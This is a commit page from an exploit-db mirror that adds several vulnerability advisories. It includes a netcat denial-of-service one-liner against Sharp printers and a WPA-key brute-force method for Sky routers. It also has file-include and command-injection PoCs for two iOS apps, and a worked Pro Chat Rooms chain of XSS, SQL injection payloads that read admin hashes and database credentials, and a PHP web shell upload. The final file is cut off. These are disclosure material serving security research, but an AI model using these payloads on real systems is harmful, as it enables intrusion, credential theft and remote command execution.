bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 08_11_2014

Browse source
This commit is contained in:
Offensive Security 2014-08-11 04:39:21 +00:00
parent 0dee5d67ec
commit b3b8cbd244
7 changed files with 866 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

6
files.csv
View file

@ -30871,6 +30871,7 @@ id,file,description,date,author,platform,type,port
34270,platforms/multiple/dos/34270.txt,"Ubisoft Ghost Recon Advanced Warfighter Integer Overflow and Array Indexing Overflow Vulnerabilities",2010-07-07,"Luigi Auriemma",multiple,dos,0
34271,platforms/multiple/remote/34271.txt,"id Software id Tech 4 Engine 'key' Packet Remote Code Execution Vulnerability",2010-07-05,"Luigi Auriemma",multiple,remote,0
34272,platforms/windows/local/34272.py,"Symantec Endpoint Protection 11.x, 12.x - Kernel Pool Overflow",2014-08-05,"ryujin & sickness",windows,local,0
34275,platforms/php/webapps/34275.txt,"Pro Chat Rooms 8.2.0 - Multiple Vulnerabilities",2014-08-06,"Mike Manzotti",php,webapps,80
34280,platforms/php/webapps/34280.txt,"PHPFABER CMS 2.0.5 Multiple Cross-Site Scripting Vulnerabilities",2010-07-04,prodigy,php,webapps,0
34281,platforms/windows/dos/34281.py,"MP3 Cutter 1.8 MP3 File Processing Remote Denial of Service Vulnerability",2010-07-09,"Prashant Uniyal",windows,dos,0
34282,platforms/php/webapps/34282.txt,"Real Estate Manager 1.0.1 'index.php' Cross-Site Scripting Vulnerability",2010-07-09,bi0,php,webapps,0
@ -30893,3 +30894,8 @@ id,file,description,date,author,platform,type,port
34300,platforms/php/webapps/34300.py,"CMS Made Simple Antz Toolkit 1.02 Module Arbitrary File Upload Vulnerability",2010-07-11,"John Leitch",php,webapps,0
34301,platforms/multiple/remote/34301.txt,"Asterisk Recording Interface 0.7.15/0.10 Multiple Vulnerabilities",2010-07-12,TurboBorland,multiple,remote,0
34302,platforms/php/webapps/34302.txt,"Diem 5.1.2 Multiple Cross Site Scripting Vulnerabilities",2010-07-13,"High-Tech Bridge SA",php,webapps,0
34303,platforms/ios/webapps/34303.txt,"PhotoSync Wifi & Bluetooth 1.0 - File Include Vulnerability",2014-08-09,Vulnerability-Lab,ios,webapps,8000
34305,platforms/ios/webapps/34305.txt,"Easy FTP Pro 4.2 iOS - Command Injection Vulnerabilities",2014-08-09,Vulnerability-Lab,ios,webapps,8080
34306,platforms/hardware/dos/34306.txt,"SHARP MX Series - Denial of Service",2014-08-09,pws,hardware,dos,23
34307,platforms/hardware/dos/34307.txt,"Sky Broadband Router SR101 - Weak WPA-PSK Generation Algorithm",2014-08-09,"Matt O'Connor",hardware,dos,0
34308,platforms/php/webapps/34308.txt,"TomatoCart 1.x - SQL Injection Vulnerability",2014-08-09,Breaking.Technology,php,webapps,80

Can't render this file because it is too large.

19
platforms/hardware/dos/34306.txt Executable file
View file

@ -0,0 +1,19 @@
# Exploit Title: SHARP MX Series - Denial Of Service
# Date: 08/08/2014
# Exploit Author: pws
# Vendor Homepage: Sharp Printers
# Firmware Link: Not found
# Tested on: Latest version
# Shodan d0rk: "SHARP Telnet server" ~4000 devices
# CVE : None yet
$ python -c 'print "A"*200 + "\n"' | nc 192.168.30.5 23
$ telnet 192.168.30.5 23
Trying 192.168.30.5 23...
telnet: Unable to connect to remote host: Connection refused
This vulnerability leads to a Denial of Service vulnerability.
Unfortunately, we were unable to retrieve the core dumped but
this flaw might result in a Buffer Overflow allowing remote command execution.

52
platforms/hardware/dos/34307.txt Executable file
View file

@ -0,0 +1,52 @@
# Exploit Title: Sky Broadband Router ? Weak algorithm used to generate WPA-PSK Key
# Google Dork:
# Date: 08/08/2014
# Author: Matt O'Connor / Planit Computing
# Advisory Link: http://www.planitcomputing.ie/sky-wifi-attack.pdf
# Version:
# Category: Remote
# Tested on: Sky SR101 Router
The SR101 routers supplied by Sky Broadband are vulnerable to an offline dictionary attack if the WPA-PSK handshake is obtained by an attacker.
The WPA-PSK pass phrase has the following features:
? Random
? A to Z Uppercase only
? 8 characters long
? 208,827,064,576 possible combinations ( AAAAAAAA ? ZZZZZZZZ ) 26^8
We notified Sky Broadband about the problem in January 2014 yet Sky Broadband are still supplying customers with routers / modems that use this weak algorithm.
At the time, graphics cards were expensive and clustering several machines was not financially viable to the average hacker.
We purchased a used rig in December 2013, comprising off:
? Windows 7
? I3 Processor
? 4GB RAM
? 2TB Drive
? Radeon HD 5850
We generated 26 dictionary files using ?mask processor? by ATOM, piping each letter out to its own file, for example:
A: ./mp32 A?u?u?u?u?u?u?u > A.TXT = AAAAAAAA ? AZZZZZZZ
B: ./mp32 B?u?u?u?u?u?u?u > B.TXT = BAAAAAAA ? BZZZZZZZ
etc
Each .txt file weighed in at around 60GB?s each. The 26 files took up about 1.6TB of storage.
We now had the complete key space, partitioned into 26 different files. This allowed us to distribute the brute force attack amongst multiple computers. There are other ways with ocl-hashcat but this was the simplest.
Using our Radeon HD5850 on standard settings, we were hitting 80,000 keys per second. Breakdown below:
? 26^8 = 208,827,064,576 ( 208 billion possible combinations )
? 26^8 / 80,000 keys per second = 2,610,338 seconds
? 2,610,338 / 60 seconds = 43,505 minutes
? 43,505 / 60 minutes = 725 hours
? 725 hours / 24 hours = 30 Days
For ?185, we had built a computer that could crack the default Sky Broadband wireless password within 30 days. The WPA-PSK handshake we used started with the letter S and was cracked within 96 hours.
We ended up getting a second machine for the same price which resulted in our maximum cracking time being reduced to 15 days.
If you?re using the default password on your Sky Broadband connection, we recommend changing it immediately to a more secure password, using a mix of letters, numbers and symbols.

238
platforms/ios/webapps/34303.txt Executable file
View file

@ -0,0 +1,238 @@
Document Title:
===============
PhotoSync Wifi & Bluetooth v1.0 - File Include Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1289
Release Date:
=============
2014-08-04
Vulnerability Laboratory ID (VL-ID):
====================================
1289
Common Vulnerability Scoring System:
====================================
6.8
Product & Service Introduction:
===============================
PhotosSync - Wifi Bluetooth let you transfer photos from one iPhone, iPod Touch, iPad to another iPhone, iPod Touch, iPad, Mac and PC.
- Wifi Transfer, support PhotosSync or most web browsers(safari, firefox, chrome, opera, IE)
- Bluetooth Transfer, very useful when no wifi , no network available
- Upload photos from Mac/PC to iPhone, iPad, iPod Touch (Wifi needed)
- QRCode, scan QRCode to download photo, very convenient
( Copy of the Homepage: https://itunes.apple.com/ke/app/photossync-wifi-bluetooth/id570672848 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a local file include web vulnerability in the official PhotoSync Wifi&Bluetooth 1.0 iOS mobile application.
Vulnerability Disclosure Timeline:
==================================
2014-08-04: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Haixia Liu
Product: PhotoSync Wifi&Bluetooth - iOS Mobile Web Application 1.0
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official PhotoSync Wifi&Bluetooth 1.0 iOS mobile application.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific
path commands to compromise the mobile web-application.
The web vulnerability is located in the `filename` value of the `upload` module. Remote attackers are able to inject own files with
malicious `filename` values in the `upload` POST method request to compromise the mobile web-application. The local file/path include
execution occcurs in the index `file list` context next to the vulnerable `filename` item value. The attacker is able to inject the
local malicious file request by usage of the available `wifi interface` (http://localhost:8000/) upload form.
Remote attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to execute
different local malicious attacks requests. The attack vector is on the application-side of the wifi service and the request method to
inject is POST.
The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count
of 6.8. Exploitation of the local file include web vulnerability requires no privileged web-application user account or user interaction.
Successful exploitation of the local file include web vulnerability results in mobile application or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Service(s):
[+] PhotoSync Wifi&Bluetooth 1.0
Vulnerable Module(s):
[+] upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] PhotoSync Images Dir Listing (http://localhost:8000/)
Proof of Concept (PoC):
=======================
The local file include web vulnerability can be exploited by local attackers without privileged application user account and
without user interaction. For security demonstration or to reproduce follow the provided information and steps below to continue.
PoC:
http://localhost:8000/images/./[LOCAL FILE INCLUDE VULNERABILITY!]
PoC: Index File Dir Listing (http://localhost:8000/)
<script type="text/javascript">
function selectDivImage(div) {
if (div.children[1].style.visibility == "hidden")
{
div.children[1].style.visibility = "visible";
}
else
{
div.children[1].style.visibility = "hidden";
}
}
function saveImages() {
var divs = document.getElementsByTagName('div');
for (var i = 0; i < divs.length; i++)
{
var div = divs[i];
if (div.children[1].style.visibility == "visible")
{
var str = div.children[0].src;
if (str.indexOf("Video") != -1)
{
str = str.replace(".jpg", ".mov");
}
window.open(str.replace("_thumbnail", ""));
}
}
}
function selectImages() {
var divs = document.getElementsByTagName('div');
for (var i = 0; i < divs.length; i++)
{
divs[i].children[1].style.visibility = "visible";
}
}
function deselectImages() {
var divs = document.getElementsByTagName('div');
for (var i = 0; i < divs.length; i++)
{
divs[i].children[1].style.visibility = "hidden";
}
}
</script>
<span style="padding-left:50px"></span>
<span style="color: blue; cursor: pointer;" onclick="deselectImages();">Deselect All</span>
<span style="padding-left:5px"></span>
<span style="color: blue; cursor: pointer;" onclick="selectImages();">Select All</span>
<span style="padding-left:5px"></span>
<span style="color: blue; cursor: pointer;" onclick="saveImages();">Save</span><br>
<div onselectstart="return false;" onclick="selectDivImage(this);">
<img src="./[LOCAL FILE INCLUDE VULNERABILITY!].png" height="75" width="75">
<img src="images/./[LOCAL FILE INCLUDE VULNERABILITY!].png" style="position:absolute; left:2px; top:2px; visibility: hidden;" height="75" width="75">
</div>
--- PoC Session Logs [POST] (LFI) ---
Status: [OK]
POST http://localhost:8000/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[unknown] Mime Type[unknown]
Request Header:
Host[localhost:8000]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
Accept[text/html,application/xhtml
+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8000/]
POST-
Daten:
POST_DATA[-----------------------------881789944691
Content-Disposition: form-data; name="file1"; filename="./[LOCAL FILE INCLUDE VULNERABILITY!].png"
Content-Type: image/png
Solution - Fix & Patch:
=======================
The file include web vulnerability can be patched by a secure encode of the vulnerable file name value. Encode and filter also the vulnerable output in
the images dir index listing file. Restrict the filename value input and filter the requests to prevent against further local file include attacks
against the main directory listing service.
Security Risk:
==============
The security risk of the local file include web vulnerability in the upload module of the mobile application is estimated as high.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

347
platforms/ios/webapps/34305.txt Executable file
View file

@ -0,0 +1,347 @@
Document Title:
===============
Easy FTP Pro v4.2 iOS - Command Inject Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1291
Release Date:
=============
2014-08-06
Vulnerability Laboratory ID (VL-ID):
====================================
1291
Common Vulnerability Scoring System:
====================================
5.7
Product & Service Introduction:
===============================
The Best FTP and SFTP client for iPhone and iPad! Easy FTP is an FTP (File Transfer Protocol) and SFTP client for
iPhone/iPod Touch. Easy FTP offer all the features of a desktop client. Also includes a web browser that allow to
download files, audio player, mp4, avi,... video player, Dropbox, also helps you to access files on your remote
computer (Mac, Windows, Linux), NAS Servers, and more.
( Copy of the Homepage: https://itunes.apple.com/en/app/easy-ftp-pro/id429071149 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered two command injection web vulnerabilities in the official Easy FTP Pro v4.2 iOS mobile application.
Vulnerability Disclosure Timeline:
==================================
2014-08-06: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Juan Ramon Rivero
Product: Easy FTP Pro - iOS Mobile Web Application 4.2
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
Two local command inject web vulnerabilities has been discovered in the official Easy FTP Pro v4.2 iOS mobile application.
The vulnerability allows remote attackers to inject own commands by usage of misconfigured stored system/device values to
compromise the apple mobile iOS application.
The first vulnerability is located in the vulnerable `foldername` value of the `easy ftp wifi` module. Local attackers are
able to inject own malicious system specific commands or path value requests in the vulnerable `foldername` input value.
The execution of the command occurs in the `File Dir Index Listing` module of the easy ftp pro v4.2 mobile application.
The attacker is able to manipulate the local device values with physical or restricted acccess to compromise the mobile
application by preparing to change the foldername. The encoding of the vulnerable values in the `File Dir Index Listing`
module is broken.
The second vulnerability is also located in the `?asy ftp wifi` module. The same attack like on changing a foldername can
be exploited by attacker through the regular filename validation. The attacker is able to manipulate the local device values
with physical or restricted acccess to compromise the mobile application by preparing to change the filename.
The attack vector is located on the application-side and the injection requires physical device access or a local low
privileged device user account. Local attackers are also able to exploit the albumname validation issue in combination
with persistent injected script codes.
The security risk of the local command/path inject vulnerability is estimated as medium with a cvss (common vulnerability
scoring system) count of 5.7. Exploitation of the command/path inject vulnerability requires a low privileged iOS device
account with restricted access and no user interaction. Successful exploitation of the vulnerability results in unauthorized
execution of system specific commands and unauthorized path value requests to compromise the mobile iOS application or the
connected device components.
Request Method(s):
[+] [Sync]
Vulnerable Module(s):
[+] Add File & Rename File + Import
[+] Add Folder & Rename Folder + Import
Vulnerable Parameter(s):
[+] foldername
[+] filename
Affected Module(s):
[+] File Dir Index Listing
Proof of Concept (PoC):
=======================
The local command inject web vulnerabilities can be exploited by local attackers with low privileged or restricted device user account
with physical access and without user interaction. For security demonstration or to reproduce the vulnerability follow the provided
information and steps below to continue.
PoC #1:
--- PoC Session Logs [GET] (Execution) ---
Status: pending[]
GET http://localhost:8080/[LOCAL COMMAND INJECT VULNERABILITY!] Load Flags[VALIDATE_ALWAYS ] Gr??e des Inhalts[unknown] Mime Type[unknown]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
12:26:56.763[0ms][total 0ms]
Status: 200[OK]
GET http://localhost:8080/index Load Flags[LOAD_DOCUMENT_URI ] Gr??e des Inhalts[unknown] Mime Type[unknown]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
12:27:11.166[0ms][total 0ms] Status: Aus dem Cache geladen[Aus dem Cache geladen]
GET http://localhost:8080/# Load Flags[LOAD_FROM_CACHE ] Gr??e des Inhalts[-1] Mime Type[unbekannt]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
PoC: Source Foldername - File Dir Index Listing
<script type="text/javascript" charset="utf-8">
function eliminaArchivo(archNombre){
$.post("/delete/"+archNombre,
function(data) {
cargaLista(rutaActual);
});
}
function comprueba(){
var fullPath = document.getElementById('uploadFile').value;
if (fullPath) {
var startIndex = (fullPath.indexOf('\\') >= 0 ? fullPath.lastIndexOf('\\') : fullPath.lastIndexOf('/'));
var filename = fullPath.substring(startIndex);
if (filename.indexOf('\\') === 0 || filename.indexOf('/') === 0) {
filename = filename.substring(1);
}
filenombre = filename;
}
return true;
}
var rutaActual = '';
function confirma(nombre){
var borrar = confirm("Do you really want to delete: "+unescape(nombre)+"?");
if (borrar == true){
//return true;
eliminaArchivo(nombre);
}
return false;
}
function cargaLista(ruta){
$("#filelist").empty();
$("#folder").empty();
var send = ruta;
if(ruta == '..'){
if(rutaActual.lastIndexOf('/')>=0)
send = rutaActual.substr(0,rutaActual.lastIndexOf('/'));
else
send = '';
}
$.ajaxSetup({cache: false});
$.getJSON('/files/'+send/*'/files/'+ruta*/,
function(data){
var shadow = false;
//console.log(data);
rutaActual = data.currentDir;
$('#folder').append('Current path: Documents/' +data.currentDir);
$.each(data.files, function(i,item){
var trclass='';
if (shadow)
trclass= " class='shadow'";
encodeName = (encodeURI(rutaActual)+'/'+item.name).replace("'", "'");
var html = '';
if(item.type == 'FILE')
html += "<tr" + trclass + "><td class='icon'> </td><td class='filename'><a href='/files/" + encodeName + "' class='file'>" +
decodeURI(item.name) + "</a></td>" + "<td class='size'>" + item.tam + "</td>";else
html += "<tr" + trclass + "><td class='icon'><img src=\"folder.png\" alt=\"folder\" height=20 width=20 /></td><td class='filename'>
<a href='javascript:cargaLista(\"" + encodeURI(item.path).replace("'", "'") + "\")' class='file'>" + decodeURI(item.name) + "</a></td>"+"<td class='size'> </td>";
html += "<td class='date'>" + item.date + "</td>" +
"<td class='del'><a href='#' onclick='confirma(\""+escape(decodeURI(encodeURI(rutaActual)+'/'+item.name)).replace("'", "'")+"\")'><img src=\"delete.gif\"
alt=\"folder\" height=20 width=20 style=\"border:0;\" /></a></td></tr>";
$(html).appendTo("#filelist");
shadow = !shadow;
});
})
.error(function(){
alert('Connection error. Check if the web sharing is on and the iphone/ipod still connected to the network.');
});
}
$.ajaxSetup({cache: true});
$(document).ready(function(){
cargaLista('');
});
</script>
PoC #2:
--- PoC Session Logs [GET] (Execution) ---
Status: 200[OK]
GET http://localhost:8080/files/%3[LOCAL COMMAND INJECT VULNERABILITY!]_=1407321412178 Load Flags[LOAD_BACKGROUND VALIDATE_ALWAYS ] Gr??e des Inhalts[42] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:8080/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[42]
Date[Wed, 06 Aug 2014 10:37:15 GMT]
Status: pending[]
GET http://localhost:8080/..%3C/[LOCAL COMMAND INJECT VULNERABILITY!] Load Flags[LOAD_DOCUMENT_URI ] Gr??e des Inhalts[unknown] Mime Type[unknown]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
PoC: Source Filename - File Dir Index Listing
<div id="tlista">
<table border="0" cellpadding="0" cellspacing="0">
<thead>
<tr>
<th class="icon"><a href="javascript:cargaLista('..')" class="file"> <img src="back.png" alt="back" border="0/" height="20" width="20"></a>
</th>
<th class="filename">
Name
</th>
<th class="size">
Size
</th>
<th class="date">
Modified
</th>
<th class="del">
<a href="javascript:cargaLista(rutaActual)" class="file"> <img src="refresh.png" alt="back" border="0/" height="16" width="16"></a>
</th>
</tr>
</thead>
</table>
<table border="0" cellpadding="0" cellspacing="0">
<tbody id="filelist"><tr><td class="icon"><img src="folder.png" alt="folder" height="20" width="20"></td><td class="filename">
<a href="javascript:cargaLista("h[LOCAL COMMAND INJECT VULNERABILITY!])" class="file">[LOCAL COMMAND INJECT VULNERABILITY!]"></a></td>
<td class='size'> </td><td class='date'>06.08.14 12:27</td><td class='del'><a href='#' onclick='confirma("/[LOCAL COMMAND INJECT VULNERABILITY!]")'>
<img src="delete.gif" alt="folder" height=20 width=20 style="border:0;" /></a></td></tr></tbody></table></iframe></a></td></tr></tbody>
Solution - Fix & Patch:
=======================
The vulnerabilities can be patched by a secure parse and encode of the vulnerable file- and foldername values.
Restrict the local app user input on both values to prevent further command injection attacks. Do not forget to parse the affected output listing in the file dir listing.
Security Risk:
==============
The security risk of both command inject web vulnerabilities in the file- and foldername values are estimated as medium(+).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

157
platforms/php/webapps/34275.txt Executable file
View file

@ -0,0 +1,157 @@
# Exploit Title: Pro Chat Rooms v8.2.0 - Multiple Vulnerabilities
# Google Dork: intitle:"Powered by Pro Chat Rooms"
# Date: 5 August 2014
# Exploit Author: Mike Manzotti @ Dionach Ltd
# Vendor Homepage: http://prochatrooms.com
# Software Link: http://prochatrooms.com/software.php
# Version: v8.2.0
# Tested on: Debian (Apache+MySQL)
1) Stored XSS
===========
Text Chat Room Software of ProoChatRooms is vulnerable to Stored XSS. After registered an account, an attacker can upload a profile picture containing Javascript code as shown below:
POST: http://<WEBSITE>/prochatrooms/profiles/index.php?id=1<http://%3cWEBSITE%3e/prochatrooms/profiles/index.php?id=1>
Content-Disposition: form-data; name="uploadedfile"; filename="nopic333.jpg"
Content-Type: image/jpeg
<script>alert(document.cookie)</script>
By inspecting the response, the web application returns a 32 digits value in the HTML tag "imgID" as shown below:
Response:
<input type="hidden" name="imgID" value="798ae9b06cd900b95ed5a60e02419d4b">
The picture is uploaded under the directory "/profiles/uploads" and is accessible by force browsing to the 32 digits value as shown below:
http://<WEBSITE>/prochatrooms/profiles/uploads/798ae9b06cd900b95ed5a60e02419d4b<http://%3cWEBSITE%3e/prochatrooms/profiles/uploads/798ae9b06cd900b95ed5a60e02419d4b>
2) Reflected XSS
=============
Text Chat Room Software of ProoChatRooms is vulnerable to Reflected XSS. The parameter "edit" is not encoded:
http://<WEBSITE>/prochatrooms/profiles/index.php?id=1&edit="><script>alert(document.cookie)</script><http://%3cWEBSITE%3e/prochatrooms/profiles/index.php?id=1&edit=%22%3e%3cscript%3ealert(document.cookie)%3c/script%3e>
3) SQL Injection
=============
Text Chat Room Software of ProoChatRooms is vulnerable to SQL injections. Across the all source code of web application, parameterized queries are used to query the database. However, a lack of data sanitization of three parameters leaves the web application vulnerable to SQLi. The vulnerable parameters are located as shown below:
prochatrooms_v8.2.0/includes/functions.php: ~2437
$params = array(
'password' => md5($password),
'email' => makeSafe($email),
'id' => $id
);
$query = "UPDATE prochatrooms_users
SET email = '".$email."',
password='".md5($password)."'
WHERE id = '".$id."'
";
prochatrooms_v8.2.0/includes/functions.php: ~2449
$query = "UPDATE prochatrooms_users
SET email = '".$email."'
WHERE id = '".$id."'
";
prochatrooms_v8.2.0/includes/functions.php: ~3110
$query = "UPDATE prochatrooms_users
SET active = '".$offlineTime."', online = '0'
WHERE username = '".makeSafe($toname)."'
";
Note that the "makeSafe" function is defined as shown below and will protect against XSS attacks only:
prochatrooms_v8.2.0/includes/functions.php: ~125
function makeSafe($data)
{
$data = htmlspecialchars($data);
return $data;
}
After registering an account, an attacker can exploit the SQL injection by editing the field email as shown below which will retrieve the MD5 hashed password of the administrator:
POST http://<WEBSITE>/prochatrooms/profiles/index.php?id=1<http://%3cWEBSITE%3e/prochatrooms/profiles/index.php?id=1>
Content-Disposition: form-data; name="profileEmail"
mm@1dn.eu', email=(select adminLogin from prochatrooms_config) where id ='1';#
The following SQL injection will retrieve the SQL connection string, which probably has clear-text database credentials.
POST http://<WEBSITE>/prochatrooms/profiles/index.php?id=1<http://%3cWEBSITE%3e/prochatrooms/profiles/index.php?id=1>
Content-Disposition: form-data; name="profileEmail"
mm@1dn.eu', email=(select load_file('/var/www/prochatrooms/includes/db.php')) where id ='1';#
4) Arbitrary File Upload
==================
It is possible to combine the Stored XSS and SQL injection vulnerabilities to upload a web shell on the server.
The following request will upload a PHP web shell and the web application will return a 32 digit value.
POST: http://<WEBSITE>/prochatrooms/profiles/index.php?id=1<http://%3cWEBSITE%3e/prochatrooms/profiles/index.php?id=1>
Content-Disposition: form-data; name="uploadedfile"; filename="m.jpg"
Content-Type: application/octet-stream
<?php system($_GET[cmd]);?>
Response:
<input type="hidden" name="imgID" value="82d0635538da4eac42da25f8f95f8c45">
Since the uploaded web shell is without extension it will not be executed:
http://<WEBSITE>/prochatrooms/profiles/uploads/82d0635538da4eac42da25f8f95f8c45<http://%3cWEBSITE%3e/prochatrooms/profiles/uploads/82d0635538da4eac42da25f8f95f8c45>
<?php system($_GET[cmd]);?>
Image:
[cid:image005.png@01CFB099.8E117F70]
However, exploiting the SQL injection it is possible to rename the file by appending a .php extension
POST http://<WEBSITE>/prochatrooms/profiles/index.php?id=1<http://%3cWEBSITE%3e/prochatrooms/profiles/index.php?id=1>
Content-Disposition: form-data; name="profileEmail"
mm@1dn.eu' where id ='1'; SELECT load_file('/var/www/prochatrooms/profiles/uploads/82d0635538da4eac42da25f8f95f8c45') INTO OUTFILE '/var/www/prochatrooms/profiles/uploads/s.php';#
Web shell:
http://<WEBSITE>/prochatrooms/profiles/uploads/s.php?cmd=id<http://%3cWEBSITE%3e/prochatrooms/profiles/uploads/s.php?cmd=id>
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Image:
[cid:image006.png@01CFB099.8E117F70]
Timeline
========
19/07/2014: Vendor informed via email
04/08/2014: Vendor informed via email
05/08/2014: Public Disclosure
Kind regards,
Mike
______________________________________________________________________
Disclaimer: This e-mail and any attachments are confidential.
It may contain privileged information and is intended for the named
addressee(s) only. It must not be distributed without Dionach Ltd consent.
If you are not the intended recipient, please notify the sender immediately and destroy this e-mail.
Any unauthorised copying, disclosure or distribution of the material in this e-mail is strictly forbidden. Unless expressly stated, opinions in this e-mail are those of the individual sender, and not of Dionach Ltd.
Dionach Ltd, Greenford House, London Road, Wheatley, Oxford OX33 1JH Company Registration No. 03908168, VAT No. GB750661242
______________________________________________________________________

47
platforms/php/webapps/34308.txt Executable file
View file

@ -0,0 +1,47 @@
Title:
